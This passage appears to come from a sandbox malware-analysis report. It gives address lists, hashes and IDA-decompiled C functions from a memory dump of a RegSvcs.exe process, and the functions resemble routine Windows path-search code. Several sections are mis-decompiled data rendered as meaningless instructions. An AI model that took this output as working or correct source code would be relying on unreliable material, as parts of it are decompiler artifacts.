0x00a5dc77
0x00a5dc79
0x00aab551
0x00aab551
0x00000000
0x00a5dc7f
0x00a5dc7f
0x00a5dc81
0x00000000
0x00a5dc83
0x00a5dc86
0x00a5dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5dc88
0x00a5dc81
0x00a5dc79
0x00a5dc6c
0x00a5dc55
0x00a5dc47
0x00a5dc43
0x00000000
0x00a5dc36
0x00a5dc23
0x00000000
0x00a5dbff
0x00a5dbf1
0x00a5dbdf
0x00a5db8f
0x00a5db92
0x00a5db95
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5db95
0x00a5db8d
0x00a5db85
0x00a5db74
0x00a5dc9f
0x00a5dca2
0x00a5dcb0
0x00a5dcb0
0x00a5dad1
0x00aab4e5
0x00aab4c8
0x00000000
0x00000000
0x00000000
0x00a5d831
0x00000000
0x00a5d800
0x00aab47f
0x00aab485
0x00000000
0x00aab485
0x00a5d665
0x00a5d652
0x00000000

Strings

x/R, xrefs: 00A5D69D

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: x/R
API String ID: 0-853207119
Opcode ID: 86c4923695ad64f5156d4e875e4c0ace312bb24048ad7c99c5ca9eed25ec95bb
Instruction ID: 6e16981d2bf8aacee1b74dab33cb8043d41595843f4d65f930b45b698d47a93b
Opcode Fuzzy Hash: 86c4923695ad64f5156d4e875e4c0ace312bb24048ad7c99c5ca9eed25ec95bb
Instruction Fuzzy Hash: 4DE1C230A00759CFDB34DF28CD50BAAB7B1BF4A305F144199ED099B692DB349D89CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A72581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00A72581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1530200227, char _a1546911907) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t243;
				signed int _t247;
				void* _t248;
				signed int _t253;
				signed int _t255;
				intOrPtr _t257;
				signed int _t260;
				signed int _t267;
				signed int _t270;
				signed int _t278;
				intOrPtr _t284;
				signed int _t286;
				signed int _t288;
				void* _t289;
				void* _t290;
				signed int _t291;
				unsigned int _t294;
				signed int _t298;
				void* _t299;
				signed int _t300;
				signed int _t304;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0xb3d360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0xb3b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t294 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t284 = 0x48;
				_t314 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t326 = 0;
				_v37 = _t314;
				if(_v48 <= 0) {
					L16:
					_t45 = _t284 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L00A64620(_t294,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t314 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t284;
							_t286 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t314;
							if(_t314 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t314 - 0xb38478;
								 *_t333 = ((0 | _t314 == 0x00b38478) - 0x00000001 & 0xfffffffb) + 7;
								E00A8F3E0(_t328,  *((intOrPtr*)(_t314 + 4)),  *_t314 & 0x0000ffff);
								_t314 = _v32;
								_t341 = _t341 + 0xc;
								_t286 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t314 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t278 = E00AD39F2(_t328);
									_t314 = _v32;
									_t328 = _t278;
								}
							}
							_t298 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t288 = _t333 + _t286 * 4;
								_v56 = _t288;
								do {
									__eflags = _t314;
									if(_t314 != 0) {
										_t243 =  *(_v60 + _t298 * 4);
										__eflags = _t243;
										if(_t243 == 0) {
											goto L30;
										} else {
											__eflags = _t243 == 5;
											if(_t243 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t288 =  *(_v60 + _t298 * 4);
										 *(_t288 + 0x18) = _t328;
										_t247 =  *(_v60 + _t298 * 4);
										__eflags = _t247 - 8;
										if(_t247 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t247 * 4 +  &M00A72959))) {
												case 0:
													__ax =  *0xb38488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00A8F3E0(__edi,  *0xb3848c, __ax & 0x0000ffff);
														__eax =  *0xb38488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00A8F3E0(_t328, _v80, _v64);
													_t273 = _v64;
													goto L26;
												case 2:
													 *0xb38480 & 0x0000ffff = E00A8F3E0(__edi,  *0xb38484,  *0xb38480 & 0x0000ffff);
													__eax =  *0xb38480 & 0x0000ffff;
													__eax = ( *0xb38480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00A8F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00A8F3E0(_t328, _v76, _v36);
														_t273 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t328 = _t328 + (_t273 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t275);
													 *((short*)(_t328 - 2)) = _t275;
													goto L28;
												case 6:
													__ebx = "\\Wow\\Wow";
													__eflags = __ebx - "\\Wow\\Wow";
													if(__ebx != "\\Wow\\Wow") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00A8F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\Wow\\Wow";
														} while (__ebx != "\\Wow\\Wow");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xb38478 & 0x0000ffff = E00A8F3E0(__edi,  *0xb3847c,  *0xb38478 & 0x0000ffff);
													__eax =  *0xb38478 & 0x0000ffff;
													__eax = ( *0xb38478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00AD39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xb36e58 & 0x0000ffff = E00A8F3E0(__edi,  *0xb36e5c,  *0xb36e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xb36e58 & 0x0000ffff;
													__eax = ( *0xb36e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t298 = _v16;
													_t314 = _v32;
													L29:
													_t288 = _t288 + 4;
													__eflags = _t288;
													_v56 = _t288;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t298 = _t298 + 1;
									_v16 = _t298;
									__eflags = _t298 - _v48;
								} while (_t298 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t247 =  *(_v60 + _t326 * 4);
						if(_t247 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t247 * 4 +  &M00A72935))) {
							case 0:
								__ax =  *0xb38488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t314 =  &_v64;
								_v80 = E00A72E3E(0,  &_v64);
								_t284 = _t284 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xb38480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xb38480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00A5EEF0(0xb379a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00A5EB70(__ecx, 0xb379a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t221 = _v72;
											__eflags = _t221;
											if(_t221 != 0) {
												L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
											}
											_t222 = _v52;
											__eflags = _t222;
											if(_t222 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
													_t222 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t294 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xb37b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00A5EB70(__ecx, 0xb379a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t338;
										_pop(_t285);
										return E00A8B640(_t222, _t285, _v8 ^ _t338, _t314, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t280 = _v56;
								if(_v56 != 0) {
									_t314 =  &_v36;
									_t282 = E00A72E3E(_t280,  &_v36);
									_t294 = _v36;
									_v76 = _t282;
								}
								if(_t294 == 0) {
									goto L44;
								} else {
									_t284 = _t284 + 2 + _t294;
								}
								goto L14;
							case 6:
								__eax =  *0xb35764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xb38478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xb38478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xb36e58 & 0x0000ffff;
								__eax = ( *0xb36e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t314 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t299 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("cmpsd");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t247;
					asm("cmpsd");
					_t248 = _t247 + _t247;
					asm("daa");
					asm("cmpsd");
					 *_t333 =  *_t333 + _t299;
					asm("es cmpsd");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t248;
					asm("cmpsd");
					 *0x1f00a726 =  *0x1f00a726 + _t248;
					_pop(_t289);
					asm("stosd");
					 *((intOrPtr*)(_t248 +  &_a1530200227)) =  *((intOrPtr*)(_t248 +  &_a1530200227)) + _t314;
					asm("stosd");
					 *_t314 =  *_t314 + _t248;
					 *((intOrPtr*)(_t328 - 0x58d78000)) =  *((intOrPtr*)(_t328 - 0x58d78000)) - _t341;
					asm("daa");
					asm("cmpsd");
					 *_t333 =  *_t333 + _t289;
					 *((intOrPtr*)(_t328 - 0x58d7b200)) =  *((intOrPtr*)(_t328 - 0x58d7b200)) - _t248;
					_a35 = _a35 + _t289;
					asm("cmpsd");
					_pop(_t290);
					asm("stosd");
					 *((intOrPtr*)(_t248 + _t289 +  &_a1546911907)) =  *((intOrPtr*)(_t248 + _t289 +  &_a1546911907)) + _t314 + _t314;
					asm("stosd");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xb1ff00);
					E00A9D08C(_t290, _t328, _t333);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t291 = _a12;
					__eflags = _t291;
					if(_t291 == 0) {
						_t253 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t255 = 4;
						while(1) {
							_v40 = _t255;
							__eflags = _t255;
							if(_t255 == 0) {
								break;
							}
							_t304 = _t255 * 0xc;
							_v48 = _t304;
							__eflags = _t291 -  *((intOrPtr*)(_t304 + 0xa21664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t270 = E00A8E5C0(_a8,  *((intOrPtr*)(_t304 + 0xa21668)), _t291);
									_t341 = _t341 + 0xc;
									__eflags = _t270;
									if(__eflags == 0) {
										_t336 = E00AC51BE(_t291,  *((intOrPtr*)(_v48 + 0xa2166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t255 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t255 = _t255 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t300 = _a4;
								__eflags = _t300;
								if(_t300 != 0) {
									_v36 = _t300;
									__eflags =  *_t300 - _t329;
									if( *_t300 == _t329) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t257 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t300;
										if( *((intOrPtr*)(_t257 + 0x48)) == _t300) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t336 = E00A72AE4( &_v36, _a8, _t291, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t300 = _v36;
													goto L75;
												}
											} else {
												_t260 = E00A56600( *(_t317 + 0x1c));
												__eflags = _t260;
												if(_t260 != 0) {
													goto L106;
												} else {
													_t300 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E00A72C50(_t300, _a8, _t291, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00A5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t267 = E00A72AE4( &_v36, _a8, _t291, _a16, _a20, _t336);
									_v32 = _t267;
									__eflags = _t267 - 0xc0000100;
									if(_t267 == 0xc0000100) {
										_v32 = E00A72C50(_v36, _a8, _t291, _a16, _a20, _t336, 1);
									}
									_v8 = _t329;
									E00A72ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t253 = _t336;
					}
					L70:
					return E00A9D0D1(_t253);
				}
				L108:
			}

0x00a72584
0x00a72586
0x00a72590
0x00a72596
0x00a72597
0x00a72598
0x00a72599
0x00a7259e
0x00a725a4
0x00a725a9
0x00a725ac
0x00a725ae
0x00a725b1
0x00a725b2
0x00a725b5
0x00a725b8
0x00a725bb
0x00a725bc
0x00a725bf
0x00a725c2
0x00a725c5
0x00a725c6
0x00a725cb
0x00a725ce
0x00a725d8
0x00a725dd
0x00a725de
0x00a725e1
0x00a725e3
0x00a725e9
0x00a726da
0x00a726da
0x00a726dd
0x00a726e2
0x00ab5b56
0x00000000
0x00a726e8
0x00a726f9
0x00a726fb
0x00a726fe
0x00a72700
0x00ab5b60
0x00000000
0x00a72706
0x00a72706
0x00a7270a
0x00a7270a
0x00a7270d
0x00a72713
0x00a72716
0x00a72718
0x00a7271c
0x00a7271e
0x00ab5b6c
0x00ab5b6f
0x00ab5b7f
0x00ab5b89
0x00ab5b8e
0x00ab5b93
0x00ab5b96
0x00ab5b9c
0x00ab5ba0
0x00ab5ba3
0x00ab5bab
0x00ab5bb0
0x00ab5bb3
0x00ab5bb3
0x00ab5ba3
0x00a72724
0x00a72726
0x00a72729
0x00a7272c
0x00a7279d
0x00a7279d
0x00a727a0
0x00a727a2
0x00000000
0x00a7272e
0x00a7272e
0x00a72731
0x00a72734
0x00a72734
0x00a72736
0x00ab5bc1
0x00ab5bc1
0x00ab5bc4
0x00000000
0x00ab5bca
0x00ab5bca
0x00ab5bcd
0x00000000
0x00ab5bd3
0x00000000
0x00ab5bd3
0x00ab5bcd
0x00a7273c
0x00a7273c
0x00a72742
0x00a72747
0x00a7274a
0x00a7274d
0x00a72750
0x00000000
0x00a72756
0x00a72756
0x00000000
0x00a72902
0x00a72908
0x00a7290b
0x00000000
0x00a72911
0x00a7291c
0x00a72921
0x00000000
0x00a72921
0x00000000
0x00000000
0x00a72880
0x00a72887
0x00a7288c
0x00000000
0x00000000
0x00a72805
0x00a7280a
0x00a72814
0x00a72816
0x00000000
0x00000000
0x00a7281e
0x00a72821
0x00a72823
0x00000000
0x00a72829
0x00a72829
0x00a72831
0x00a7283c
0x00a7283e
0x00000000
0x00a7283e
0x00000000
0x00000000
0x00a7284e
0x00a72850
0x00a72851
0x00a72854
0x00a72857
0x00a7285a
0x00a7285c
0x00a7285d
0x00000000
0x00000000
0x00a7275d
0x00a72761
0x00000000
0x00a72767
0x00a7276e
0x00a72773
0x00a72773
0x00a72776
0x00a72778
0x00a7277e
0x00a7277e
0x00a72781
0x00a72781
0x00a72783
0x00a72784
0x00000000
0x00000000
0x00ab5bd8
0x00ab5bde
0x00ab5be4
0x00ab5be6
0x00ab5be8
0x00ab5be9
0x00ab5bee
0x00ab5bf8
0x00ab5bff
0x00ab5c01
0x00ab5c04
0x00ab5c07
0x00ab5c0b
0x00ab5c0d
0x00ab5c0d
0x00ab5c15
0x00ab5c18
0x00ab5c1b
0x00ab5c1b
0x00ab5c1e
0x00000000
0x00000000
0x00a728c3
0x00a728c8
0x00a728d2
0x00a728d4
0x00a728d8
0x00a728db
0x00ab5c26
0x00ab5c28
0x00ab5c2d
0x00ab5c2d
0x00000000
0x00000000
0x00ab5c34
0x00ab5c36
0x00ab5c49
0x00ab5c4e
0x00ab5c54
0x00ab5c5b
0x00ab5c5d
0x00ab5c60
0x00a72788
0x00a72788
0x00a7278b
0x00a7278e
0x00a7278e
0x00a7278e
0x00a72791
0x00000000
0x00000000
0x00a72756
0x00a72750
0x00000000
0x00a72794
0x00a72794
0x00a72795
0x00a72798
0x00a72798
0x00000000
0x00a72734
0x00a7272c
0x00a72700
0x00a725ef
0x00a725ef
0x00a725ef
0x00a725f2
0x00a725f8
0x00000000
0x00000000
0x00a725fe
0x00000000
0x00a728e6
0x00a728ec
0x00a728ef
0x00a728f5
0x00a728f8
0x00a728f8
0x00000000
0x00a728f8
0x00000000
0x00000000
0x00a72866
0x00a72866
0x00a72876
0x00a72879
0x00000000
0x00000000
0x00a727e0
0x00a727e7
0x00a727e9
0x00a727eb
0x00ab5afd
0x00000000
0x00ab5afd
0x00000000
0x00000000
0x00a72633
0x00a72638
0x00a7263b
0x00a7263c
0x00a7263e
0x00a72640
0x00a72642
0x00a72647
0x00a72649
0x00a7264e
0x00a72650
0x00a72653
0x00a72659
0x00a726a2
0x00a726a7
0x00a726ac
0x00a726b2
0x00ab5b11
0x00ab5b15
0x00ab5b17
0x00000000
0x00a726b8
0x00a726b8
0x00a726ba
0x00a727a6
0x00a727a6
0x00a727a9
0x00a727ab
0x00a727b9
0x00a727b9
0x00a727be
0x00a727c1
0x00a727c3
0x00a727c5
0x00a727c7
0x00ab5c74
0x00ab5c79
0x00ab5c79
0x00a727c7
0x00000000
0x00a726c0
0x00a726c0
0x00a726c3
0x00a726c6
0x00a726c6
0x00a726c9
0x00a726c9
0x00000000
0x00a726c9
0x00a726ba
0x00a7265b
0x00a7265b
0x00a7265e
0x00a72667
0x00a7266d
0x00a72677
0x00a7267c
0x00a7267f
0x00a72681
0x00ab5b49
0x00ab5b4e
0x00a727cd
0x00a727d0
0x00a727d1
0x00a727d2
0x00a727d4
0x00a727dd
0x00a72687
0x00a72687
0x00a7268a
0x00a7268b
0x00a7268e
0x00a7268f
0x00a72691
0x00a72696
0x00a72698
0x00a7269d
0x00a7269f
0x00000000
0x00a7269f
0x00a72681
0x00000000
0x00000000
0x00a72846
0x00000000
0x00000000
0x00a72605
0x00a7260a
0x00a7260c
0x00a72611
0x00a72616
0x00a72619
0x00a72619
0x00a7261e
0x00000000
0x00a72624
0x00a72627
0x00a72627
0x00000000
0x00000000
0x00ab5b1f
0x00000000
0x00000000
0x00a72894
0x00a7289b
0x00a7289d
0x00a728a1
0x00ab5b2b
0x00ab5b2e
0x00ab5b2e
0x00a728a7
0x00a728a9
0x00ab5b04
0x00ab5b09
0x00ab5b09
0x00ab5b09
0x00000000
0x00000000
0x00ab5b35
0x00ab5b3c
0x00a728fb
0x00a728fb
0x00a726cc
0x00a726cc
0x00a726d0
0x00000000
0x00a726d2
0x00a726d2
0x00000000
0x00a726d2
0x00000000
0x00000000
0x00a725fe
0x00a7292d
0x00a7292f
0x00a72930
0x00a72935
0x00a72937
0x00a72938
0x00a7293b
0x00a7293c
0x00a7293e
0x00a7293f
0x00a72940
0x00a72942
0x00a72944
0x00a72947
0x00a72948
0x00a7294e
0x00a7294f
0x00a72950
0x00a72957
0x00a72958
0x00a7295a
0x00a72962
0x00a72963
0x00a72964
0x00a72966
0x00a7296c
0x00a7296f
0x00a72972
0x00a72973
0x00a72974
0x00a7297b
0x00a7297e
0x00a7297f
0x00a72980
0x00a72981
0x00a72982
0x00a72983
0x00a72984
0x00a72985
0x00a72986
0x00a72987
0x00a72988
0x00a72989
0x00a7298a
0x00a7298b
0x00a7298c
0x00a7298d
0x00a7298e
0x00a7298f
0x00a72990
0x00a72992
0x00a72997
0x00a729a3
0x00a729a6
0x00a729ab
0x00a729ad
0x00a729b0
0x00a729b2
0x00ab5c80
0x00a729b8
0x00a729b8
0x00a729bb
0x00a729c0
0x00a729c5
0x00a729c6
0x00a729c6
0x00a729c9
0x00a729cb
0x00000000
0x00000000
0x00a729cd
0x00a729d0
0x00a729d9
0x00a729db
0x00a729dd
0x00a72a7f
0x00a72a84
0x00a72a87
0x00a72a89
0x00ab5ca1
0x00ab5ca3
0x00000000
0x00a72a8f
0x00a72a8f
0x00000000
0x00a72a8f
0x00000000
0x00a729e3
0x00a729e3
0x00a729e3
0x00000000
0x00a729e3
0x00a729dd
0x00000000
0x00a729db
0x00a729e6
0x00a729e9
0x00a729eb
0x00a729ed
0x00a729f3
0x00a729f5
0x00a729f8
0x00a729fa
0x00a72a97
0x00a72a9a
0x00a72a9d
0x00a72add
0x00000000
0x00a72a9f
0x00a72aa2
0x00a72aa5
0x00a72aa8
0x00a72aab
0x00ab5cab
0x00ab5caf
0x00ab5cc5
0x00ab5cda
0x00ab5cdc
0x00ab5cdf
0x00ab5ce5
0x00000000
0x00ab5ceb
0x00ab5ced
0x00ab5cee
0x00000000
0x00ab5cee
0x00ab5cb1
0x00ab5cb4
0x00ab5cb9
0x00ab5cbb
0x00000000
0x00ab5cbd
0x00ab5cbd
0x00000000
0x00ab5cbd
0x00ab5cbb
0x00a72ab1
0x00a72ab1
0x00a72ac4
0x00a72ac6
0x00a72ac6
0x00000000
0x00a72ac6
0x00a72aab
0x00000000
0x00a72a00
0x00a72a09
0x00a72a0e
0x00a72a21
0x00a72a24
0x00a72a35
0x00a72a3a
0x00a72a3d
0x00a72a42
0x00a72a59
0x00a72a59
0x00a72a5c
0x00a72a5f
0x00a72a5f
0x00a729fa
0x00a729f3
0x00a72a64
0x00a72a64
0x00a72a6b
0x00a72a6b
0x00a72a6d
0x00a72a72
0x00a72a72
0x00000000

Strings

PATH, xrefs: 00A72642, 00A72691

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 49a480fd4641e5edfa19f5ac57bda1b6bbb975ad325c1a08f0d5d22dd897fa80
Instruction ID: 0c4674f835e7f256f953b90d1c7dc7d064101b70190657cc177a8a40eb762e29
Opcode Fuzzy Hash: 49a480fd4641e5edfa19f5ac57bda1b6bbb975ad325c1a08f0d5d22dd897fa80
Instruction Fuzzy Hash: 40C16175E102199FCB29DFA9DD81BAEB7B5FF48700F14C029F905AB251EB34A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A7FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00A7FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00A5EEF0(0xb37b60);
					_t134 =  *0xb37b84; // 0x776f7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xb37b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xb37b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
